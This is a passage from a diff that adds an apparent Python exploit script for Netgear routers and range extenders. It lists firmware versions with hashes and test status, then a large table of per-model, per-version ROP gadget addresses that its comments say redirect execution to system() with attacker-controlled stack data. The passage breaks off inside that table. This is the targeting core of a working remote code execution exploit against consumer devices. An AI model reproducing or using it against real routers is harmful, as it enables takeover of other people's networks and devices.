V1.0.0.36_1.0.30 74ee38f55aedd22b1eab1dbf40b11386 Untested +# WNDR3700v3 V1.0.0.30_1.0.27 82441ed888457dcdd73dec464ded0fdc Untested +# WNDR3700v3 V1.0.0.22_1.0.17 82c000f2875fcf4124ec520a49abb16b Untested +# WNDR3700v3 V1.0.0.18_1.0.14 11b537851e5429908b1d6ba720db2869 Tested +# WNDR4000 V1.0.2.10_9.1.89 acecc4d245b1d3ac2a9863a26578f150 Tested +# WNDR4000 V1.0.2.6_9.1.87 fe27305c1bcf41d76ed261aefb28c3bc Untested +# WNDR4000 V1.0.2.4_9.1.86 fd0b612d1d38adb9e06b34f71d32c02f Tested +# WNDR4000 V1.0.2.2_9.1.84 db0094ac915fdc03f939d8e322a90ab7 Untested +# WNDR4000 V1.0.0.94_9.1.81 0f5429b29cd3e891e79674989aec023c Untested +# WNDR4000 V1.0.0.90_9.1.79 3fa15f5a61b941a2c0135af3e515c5e8 Untested +# WNDR4000 V1.0.0.88_9.1.77 7abf69863995397c54b425ca80b30b53 Untested +# WNDR4000 V1.0.0.82_8.0.71 5523a6ff5e7b9e09ce13390c55afe218 Tested +# WNDR4000 V1.0.0.66_8.0.55 36a4947d7073786d72f455d757361db6 Untested +# WNDR4500 V1.0.1.46_1.0.76 84574e9f9fe95c604448052edb4d8d87 Untested +# WNDR4500 V1.0.1.40_1.0.68 dc85b49521a1c363c73bf1ebe8c73ba0 Untested +# WNDR4500 V1.0.1.38_1.0.64 2c740bb2e8475e8265d03896eca8fc25 Untested +# WNDR4500 V1.0.1.36_1.0.63 2c7bf148fd493ea4def07e6c1cc23303 Untested +# WNDR4500 V1.0.1.20_1.0.40 5455b061ee711044c5486590cca00ff0 Untested +# WNDR4500 V1.0.1.18_1.0.36 379ff2bad24e59f83198417a7bcd733c Untested +# WNDR4500 V1.0.1.6_1.0.24 30e3aa7b3fab44e518a336d74bfa453e Untested +# WNDR4500 V1.0.0.58_1.0.13 bdb781e3112fa9ffe30d16117ecd701d Untested +# WNDR4500 V1.0.0.50_1.0.12 0162e056eb5d34da63ff8e6d4d73f5a0 Untested +# WNDR4500 V1.0.0.40_1.0.10 48a3028c2e06d22fee5161fba04b260d Untested +# WNDR4500v2 V1.0.0.72_1.0.45 c5f20d0f2cee57993508c0418392e0f3 Tested +# WNDR4500v2 V1.0.0.68_1.0.42 af43fabb4e9ff2e2318d2a36417bd978 Untested +# WNDR4500v2 V1.0.0.64_1.0.40 1d7bc84bb31f20ceaa573e36be1b0857 Untested +# WNDR4500v2 V1.0.0.62_1.0.39 4134d640352f4d577f6185f4c0ebfb4a Untested +# WNDR4500v2 V1.0.0.60_1.0.38 d24a33895a62e79a4f78055520319e45 Tested +# WNDR4500v2 V1.0.0.56_1.0.36 1220bf91d071f907ad2642b550268b9b Untested +# WNDR4500v2 V1.0.0.54_1.0.33 4b1967613a61bc6c2120069ba68a1d5b Untested +# WNDR4500v2 V1.0.0.50_1.0.30 15f6b8ea1aba81531f1c53f68519946f Untested +# WNDR4500v2 V1.0.0.42_1.0.25 544ccf81ef326f62455bdac3159cfc83 Untested +# WNDR4500v2 V1.0.0.36_1.0.21 34ef5af300ef8a2c4528f29a5075610a Untested +# WNDR4500v2 V1.0.0.26_1.0.16 fb9ff113df712a183d6346c620ee87cd Untested +# WNR834Bv2 V2.1.13_2.1.13 2d6331f57ce223c595602c0a90926b0e Untested +# WNR834Bv2 V2.1.13_2.1.13NA c42048a86d1f24036fc03d065381809e Tested +# WNR834Bv2 V2.0.8_2.0.8 6dc2d3a927cee46b2ef538d3ee6d54d9 Untested +# WNR834Bv2 V2.0.8_2.0.8NA f146e01301d76991b6fdc8230ad5fb15 Untested +# WNR834Bv2 V1.0.32_1.0.32 2529e65416073a7ec0f414314517bcea Untested +# WNR834Bv2 V1.0.32_1.0.32NA a7a8fc6ae466ec8cc90dda8253fba107 Untested +# WNR1000v3 V1.0.2.72_60.0.96 d411870b5481c7cd0eb562910ef2c073 Untested +# WNR1000v3 V1.0.2.72_60.0.96NA 295e02ba735bd0af037559d774b9a2db Tested +# WNR1000v3 V1.0.2.68_60.0.93 ff97e01e443cc81bb30f03fc0efe5308 Untested +# WNR1000v3 V1.0.2.68_60.0.93NA 7ba59824dc432a51a535087b0d3ac81e Untested +# WNR1000v3 V1.0.2.62_60.0.87 29f0ec7ed9a0ce791646d81093d0c8e3 Untested +# WNR1000v3 V1.0.2.62_60.0.87NA 245b31c66e707af407846dca4b9b7a8e Untested +# WNR1000v3 V1.0.2.60_60.0.86WW fe9d4fb399ba44f717a2939cd17072ce Untested +# WNR1000v3 V1.0.2.60_60.0.86NA 9cfaf1947bc6d5745faee53495293ff7 Untested +# WNR1000v3 V1.0.2.54_60.0.82 1e268e025b02efcc0bb06c2b4625628b Untested +# WNR1000v3 V1.0.2.54_60.0.82NA 6e10842a669a29f1bfdd76473123d690 Untested +# WNR1000v3 V1.0.2.28_52.0.60 420a11918e1f453f021e230d73406fb6 Untested +# WNR1000v3 V1.0.2.28_52.0.60NA 509a52eb9a78f1ff769b0f0c84ad2b9d Untested +# WNR1000v3 V1.0.2.26_51.0.59 8767f575ddfbd4665d7dd05e42faf079 Untested +# WNR1000v3 V1.0.2.26_51.0.59NA 6692853b230f3af1b690671a27bd059f Untested +# WNR1000v3 V1.0.2.18_47.0.52 1e40904ed44bf26bbfeecbd2c0dec4fe Untested +# WNR1000v3 V1.0.2.18_47.0.52NA f6dafa4be552fe2a5753281a2f80c5ec Untested +# WNR1000v3 V1.0.2.4_39.0.39 ef2240e32d1c7d76ca541c0d329d5a7d Untested +# WNR2000v2 V1.2.0.8_36.0.60 777527ae69d32f5cd0fda49d9987c176 Tested +# WNR2000v2 V1.2.0.8_36.0.60NA 542ecd9c806cbbf4916e01bb89eeb5a8 Untested +# WNR2000v2 V1.2.0.6_36.0.58 6d480f84ab1eda1f1ae3ed86a80e9b59 Untested +# WNR2000v2 V1.2.0.6_36.0.58NA 6d480f84ab1eda1f1ae3ed86a80e9b59 Untested +# WNR2000v2 V1.2.0.4_35.0.57 1e628de1f92428df23cd55dfd223c068 Untested +# WNR2000v2 V1.2.0.4_35.0.57NA 6d1f447d9d84a86f9a08b46f506ff1d9 Tested +# WNR2000v2 V1.0.0.40_32.0.54 043e419fd8c05607ec9e5b4482c95f13 Tested +# WNR2000v2 V1.0.0.40_32.0.54NA 6b55ee8f255f57414338ee05282bdca9 Untested +# WNR2000v2 V1.0.0.35_29.0.47 715eb802324b205e7f56a85d43665f7f Untested +# WNR2000v2 V1.0.0.34_29.0.45 51eaa4d099f0cdb46f633564f62f8497 Untested +# WNR2000v2 V1.0.0.34_29.0.45NA 577a2e81d0dd7d34bee9c63819538f76 Untested +# WNR3500 V1.0.36_8.0.36NA d860aaf29860050a007e633b89664974 Tested +# WNR3500 V1.0.30_8.0.30 1f848e4d7e6703048cf0181824fb609b Untested +# WNR3500 V1.0.29_8.0.29NA 3c1fdb2291946a0a926807695c12628c Untested +# WNR3500 V1.0.22_6.0.22 d8a129dfaea562433cf80be956300b2f Untested +# WNR3500 V1.0.22_6.0.22NA 45a17326c49ac43bcb6b18afb3c0b5f5 Untested +# WNR3500 V1.0.15_1.0.15NA e070997c460f44ab988a04a0efce13bb Untested +# WNR3500 V1.0.10_1.0.10NA 5977786564b864cbf4e42cdd797616ba Untested +# WNR3500v2 V1.2.2.28_25.0.85 e8693f52138f70fa9ada17e963a6afb4 Untested +# WNR3500v2 V1.2.2.28_25.0.85NA bf5336cceb49ac9bb9448e53147f869c Untested +# WNR3500v2 V1.0.2.14_24.0.74 6b443549f93556df02d9e1d9f93b3ce2 Untested +# WNR3500v2 V1.0.2.14_24.0.74NA 386f51b17623cbc359fc3135baf40b0a Untested +# WNR3500v2 V1.0.2.10_23.0.70 46436291f6c3e3d27648d595fef53ae7 Untested +# WNR3500v2 V1.0.2.10_23.0.70NA 3e5c2fc4a6466b601da6187868d93da1 Untested +# WNR3500v2 V1.0.0.64_11.0.51 d0c84ea109ab5acd924a3e89adf530f0 Untested +# WNR3500v2 V1.0.0.64_11.0.51NA 139e55982a1b17e078172bd4f9396abd Untested +# WNR3500L V1.2.2.48_35.0.55NA 94a53de4ee1a4157072b96bedaec92af Tested +# WNR3500L V1.2.2.44_35.0.53 c22b8c6b14d29a9e5610b1db5f516dfb Untested +# WNR3500L V1.2.2.44_35.0.53NA 5e37f509dfa90a0d50532d5a8f58e0e7 Tested +# WNR3500L V1.2.2.40_34.0.48 e5ddafb1962c69c5fed3c7a107bb8f6f Untested +# WNR3500L V1.2.2.40_34.0.48NA 72b02a418f587ff453cf4fd22aff9220 Untested +# WNR3500L V1.2.2.30_34.0.37 70d568a9b4a5a7691d2efc8197fdf7c5 Untested +# WNR3500L V1.2.2.30_34.0.37NA 5a6bd3069dc06833bf48eedd9394404e Untested +# WNR3500L V1.0.2.50_31.1.25 e9931e6dc7e2bd65f8b62609c108439b Tested +# WNR3500L V1.0.2.50_31.1.25NA fe186aa9a4636ad1a5914337f6ca7abf Untested +# WNR3500L V1.0.2.26_30.0.98 517b93770badf97ffec0b86bfda4f023 Untested +# WNR3500L V1.0.2.26_30.0.98NA 27f4a60eccc9d5a444b889abb8711870 Untested +# WNR3500L V1.0.0.88_13.0.76 0df99aa41a37b89bca3b987a89cc8d94 Untested +# WNR3500L V1.0.0.88_13.0.76NA c56d6ec2595a35dc42fb069df34d2446 Untested +# WNR3500L V1.0.0.86_13.0.75 c3408d55c826743cf772599c54b0bf18 Untested +# WNR3500L V1.0.0.86_13.0.75NA 58f6b918e96bd9a55cfa18a3358690cd Untested +# WNR3500Lv2 V1.2.0.56_50.0.96 8ce62e097cc3d1872c7e8d7d08c63ce4 Tested +# WNR3500Lv2 V1.2.0.54_50.0.94 b350794ce4fec6ccf730b811a676bf3d Untested +# WNR3500Lv2 V1.2.0.50_50.0.90 71de09faa64e5a4d6c78a476b57c8f77 Untested +# WNR3500Lv2 V1.2.0.48_40.0.88 78d236e8d0f23db2e2c9645bdfd308ee Untested +# WNR3500Lv2 V1.2.0.46_40.0.86 603d5ce196612709fcd8122b8a09cdaa Untested +# WNR3500Lv2 V1.2.0.44_40.0.84 c745ed78281129c513d5d96471c2f250 Untested +# WNR3500Lv2 V1.2.0.40_40.0.80 d6de6022ff9381fb354c68008858c5ab Untested +# WNR3500Lv2 V1.2.0.38_40.0.78 902b6264511eb4067c8f37c3d2405d38 Untested +# WNR3500Lv2 V1.2.0.34_40.0.75 e5b431877b953c9d5699003af3f5dc8d Untested +# WNR3500Lv2 V1.2.0.32_40.0.74 5d8f4bd2d847ec1f6274546dea54ce02 Untested +# WNR3500Lv2 V1.2.0.28_40.0.72 582fb44d1d46856fdd7168ad4e37514a Untested +# WNR3500Lv2 V1.2.0.26_40.0.71 adbd30a2e76dfb0676f21ff7afcbb76e Untested +# WNR3500Lv2 V1.2.0.20_40.0.68 05f2658e63f0f8e7b32e1c8d945f6834 Untested +# WNR3500Lv2 V1.2.0.18_40.0.67 3a35d7237573c8e21c048dfcc0715039 Untested +# WNR3500Lv2 V1.2.0.16_40.0.66 6b65c8d0cba353d655abc311caa28741 Untested +# WNR3500Lv2 V1.0.0.14_37.0.50 29dba756cc53cbaab1ec11c3a509f0a2 Untested +# WNR3500Lv2 V1.0.0.10 af2d51ddebe58e58aad5309b63eb6c45 Untested +# XR300 V1.0.3.38_10.3.30 e0b2fc5b04cd98e794df05ebac65e596 Untested +# XR300 V1.0.3.34_10.3.27 7e20864385587876e149b9b745568f39 Untested +# XR300 V1.0.3.26_10.3.22 69f1ce725f125e266a27c9419cdb82cc Untested +# XR300 V1.0.2.24_10.3.21 ab533f222aa912f02550ffb59379b728 Untested +# XR300 V1.0.2.18_10.3.15 df58b36f5047a5e6092b91851b46d235 Untested +# XR300 V1.0.1.4_10.1.4 c15de8b9c78405d565b29c5a2a01eda1 Untested +# +import SimpleHTTPServer +import SocketServer +import argparse +import collections +import os +import shutil +import socket +import struct +import sys +import time + +########################################################################### +## Version Info ########################################################### +########################################################################### + +# Gadget addresses used in the exploit. +address_info = { + "AC1450" : { + # 0) gadget: calls system($sp) + "1.0.0.36" : 0x2958c, + "1.0.0.34" : 0x28bd8, + "1.0.0.22" : 0x27cc4, + "1.0.0.14" : 0x27cc4, + "1.0.0.8" : 0x27ca4, + "1.0.0.6" : 0x27ca4, + }, + "D6220" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.52" : 0x417CF8, + "1.0.0.48" : 0x417CF8, + "1.0.0.46" : 0x417CF8, + "1.0.0.44" : 0x4179B8, + "1.0.0.40" : 0x4179B8, + "1.0.0.36" : 0x417864, + "1.0.0.34" : 0x417864, + "1.0.0.32" : 0x4178D4, + "1.0.0.28" : 0x417804, + "1.0.0.24" : 0x41736C, + "1.0.0.22" : 0x416F54, + "1.0.0.16" : 0x416034, + }, + "D6300" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.102" : [0x44232C, 0x412D40], + "1.0.0.96" : [0x441CFC, 0x412BA8], + "1.0.0.90" : [0x441CFC, 0x412BA8], + "1.0.0.88" : [0x441D2C, 0x412BA8], + "1.0.0.76" : [0x4418BC, 0x412A88], + "1.0.0.72" : [0x440C8C, 0x412748], + "1.0.0.42" : [0x438224, 0x411CB4], + "1.0.0.30" : [0x438224, 0x411CB4], + "1.0.0.24" : [0x437FC4, 0x411C34], + "1.0.0.16" : [0x438024, 0x411BA8], + }, + "D6400" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.88" : 0x417CA8, + "1.0.0.86" : 0x417CA8, + "1.0.0.82" : 0x417CA8, + "1.0.0.80" : 0x417CA8, + "1.0.0.78" : 0x417968, + "1.0.0.74" : 0x417968, + "1.0.0.70" : 0x417814, + "1.0.0.68" : 0x417814, + "1.0.0.66" : 0x4177B4, + "1.0.0.60" : 0x4176E4, + "1.0.0.58" : 0x4172FC, + "1.0.0.56" : 0x416EF4, + "1.0.0.54" : 0x416764, + "1.0.0.52" : 0x4160C4, + "1.0.0.44" : 0x415FC4, + "1.0.0.38" : 0x434B28, + "1.0.0.34" : 0x433FD8, + "1.0.0.22" : 0x432098, + }, + "D7000V2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.56" : 0x41667C, + "1.0.0.53" : 0x41667C, + "1.0.0.52" : 0x41667C, + "1.0.0.51" : 0x41667C, + "1.0.0.47" : 0x41631C, + "1.0.0.45" : 0x41627C, + "1.0.0.44" : 0x41627C, + "1.0.0.40" : 0x41619C, + "1.0.0.38" : 0x415D4C, + }, + "D8500" : { + # 0) gadget: calls system($sp) + "1.0.3.44" : 0x3b3f8, + "1.0.3.43" : 0x3afd0, + "1.0.3.42" : 0x3afd0, + "1.0.3.39" : 0x3ac0c, + "1.0.3.36" : 0x3a9c8, + "1.0.3.35" : 0x3a994, + "1.0.3.28" : 0x3a500, + "1.0.3.27" : 0x3a254, + "1.0.3.25" : 0x39d88, + }, + "DC112A" : { + # 0) gadget: calls system($sp) + "1.0.0.44" : 0x2e3cc, + "1.0.0.30" : 0x2d0e0, + "1.0.0.24" : 0x2d224, + }, + "DGN2200" : { + # 0) set $a0 to $sp+0x1B9 then jumps to $s1 + # 1) calls system without setting $a0 + "1.0.0.58" : [0x44DD40, 0x44BCEC], + "1.0.0.57" : [0x44D3A0, 0x44B360], + "1.0.0.55" : [0x44D300, 0x44B2C0], + "1.0.0.52" : [0x44BEF0, 0x449EB0], + "1.0.0.50NA" : [0x44BA54, 0x449A14], + "1.0.0.36" : [0x449438, 0x447490], + "1.0.0.36NA" : [0x44908C, 0x4470E4], + }, + "DGN2200V4" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.110" : [0x4336D4, 0x407370], + "1.0.0.108" : [0x4331C4, 0x407370], + "1.0.0.102" : [0x432F64, 0x407370], + "1.0.0.98" : [0x432CF4, 0x4072A0], + "1.0.0.90" : [0x432BA4, 0x407280], + "1.0.0.86" : [0x4328A4, 0x407280], + "1.0.0.82" : [0x431E44, 0x407220], + "1.0.0.76" : [0x431954, 0x4071E0], + "1.0.0.66" : [0x431104, 0x41232C], + "1.0.0.62" : [0x431104, 0x41232C], + "1.0.0.58" : [0x431104, 0x41232C], + "1.0.0.46" : [0x431104, 0x41232C], + "1.0.0.24" : [0x42BAE0, 0x412278], + "1.0.0.5" : [0x42B150, 0x411D5C], + }, + "DGN2200M" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.37" : [0x486B70, 0x411F88], + "1.0.0.35" : [0x484560, 0x411EE8], + "1.0.0.35NA" : [0x483F90, 0x411F08], + "1.0.0.33" : [0x483D90, 0x411F34], + "1.0.0.33NA" : [0x483780, 0x411F54], + "1.0.0.26" : [0x474B60, 0x410520], + "1.0.0.24NA" : [0x474350, 0x4104D8], + }, + "DGND3700" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.17" : [0x484EF4, 0x4107DC], + "1.0.0.17NA" : [0x4848F4, 0x4107DC], + "1.0.0.12" : [0x484914, 0x4107BC], + "1.0.0.12NA" : [0x484314, 0x4107BC], + }, + "EX3700" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618], + "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c], + "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c], + "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc], + "1.0.0.24" : [0x61d580+0x72c, 0x40b61c, 0x41e9dc], + "1.0.0.22" : [0x61d440+0x72c, 0x40b61c, 0x41e9dc], + }, + "EX3800" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618], + "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c], + "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c], + "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc], + }, + "EX3920" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618], + "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c], + "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c], + "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc], + }, + "EX6000" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.38" : [0x61fd80+0x724, 0x40b680, 0x41d3c4], + "1.0.0.32" : [0x61deb0+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.30" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.28" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.24" : [0x61dfb0+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.20" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.10" : [0x61e000+0x730, 0x40b684, 0x41ea4c], + }, + "EX6100" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.2.24" : [0x61e590+0x72c, 0x40b5b4, 0x41d0f4], + "1.0.2.18" : [0x6235e0+0x740, 0x40b6a4, 0x41c778], + "1.0.2.16" : [0x6235e0+0x740, 0x40b6a4, 0x41c778], + "1.0.2.6" : [0x6235e0+0x740, 0x40b6a4, 0x41c7a8], + "1.0.1.36" : [0x6225e0+0x740, 0x40b684, 0x41c588], + "1.0.0.28" : [0x5df540+0x700, 0x40aef8, 0x41ffa4], + "1.0.0.22" : [0x5de4f0+0x700, 0x40aedc, 0x41ff60], + }, + "EX6120" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.48" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.46" : [0x61f1d0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.42" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.40" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.36" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.32" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.30" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.28" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.26" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.16" : [0x61e4b0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.14" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.8" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.4" : [0x61df60+0x730, 0x40b684, 0x41ea4c], + }, + "EX6130" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.30" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.28" : [0x61f1d0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.24" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.22" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.20" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.16" : [0x61dd20+0x72c, 0x40b544, 0x41c5e8], + "1.0.0.12" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + }, + "EX6150" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _term_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.42" : [0x56ab80+0x2e8, 0x522b40, 0x417748], + "1.0.0.34" : [0x570f00+0x208, 0x522ff0, 0x416b50], + "1.0.0.32" : [0x570d30+0x208, 0x522ff0, 0x416b50], + "1.0.0.28" : [0x570d20+0x208, 0x522ff0, 0x416b50], + "1.0.0.16" : [0x570b90+0x208, 0x522e00, 0x416b50], + "1.0.0.14" : [0x570b00+0x204, 0x522e20, 0x418828], + }, + "EX6200" : { + # 0) gadget: calls system($sp) + "1.0.3.90" : 0x226f8, + "1.0.3.88" : 0x226f8, + "1.0.3.82" : 0x223fc, + "1.0.3.76" : 0x220d0, + "1.0.3.74" : 0x220b0, + "1.0.3.68" : 0x21f50, + "1.0.1.60" : 0x21260, + "1.0.0.52" : 0x20e2c, + "1.0.0.46" : 0x20e2c, + "1.0.0.42" : 0x20e2c, + "1.0.0.38" : 0x20df0, + }, + "EX6920" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.40" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.36" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.32" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.30" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.28" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.26" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.16" : [0x61e4b0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.14" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.8" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.4" : [0x61df60+0x730, 0x40b684, 0x41ea4c], + }, + "EX7000" : { + # 0) gadget: calls system($sp) + "1.0.1.84" : 0x26f64, + "1.0.1.80" : 0x26f64, + "1.0.1.78" : 0x26d8c, + "1.0.0.66" : 0x2352c, + "1.0.0.62" : 0x2287c, + "1.0.0.58" : 0x2287c, + "1.0.0.56" : 0x2287c, + "1.0.0.50" : 0x225d4, + "1.0.0.42" : 0x22430, + "1.0.0.38" : 0x22370, + "1.0.0.36" : 0x223bc, + "1.0.0.32" : 0x22bc0, + "1.0.0.30" : 0x22bc0, + }, + "LG2200D" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.57" : 0x44f90c, + }, + "MBM621" : { + # 0) gadget: calls system($sp+0x18) + "1.1.3" : 0x4126b8, + }, + "MBR624GU" : { + # 0) gadget: calls system($sp) + "6.1.30.64" : 0x19728, + "6.1.30.61" : 0x19680, + "6.1.30.59" : 0x19680, + "6.1.30.59NA" : 0x19394, + "6.0.30.46" : 0x196ac, + "6.0.28.43" : 0x1932c, + "6.0.28.43NA" : 0x19618, + "6.0.26.21" : 0x1897c, + "6.0.22.14NA" : 0x18190, + "6.0.22.12" : 0x18190, + }, + "MBR1200" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.2.53" : [0x4711C0, 0x40CDD0], + }, + "MBR1515" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.2.68" : [0x48CFE0, 0x412A38], + }, + "MBR1516" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.2.84BM" : [0x48A210, 0x412534], + 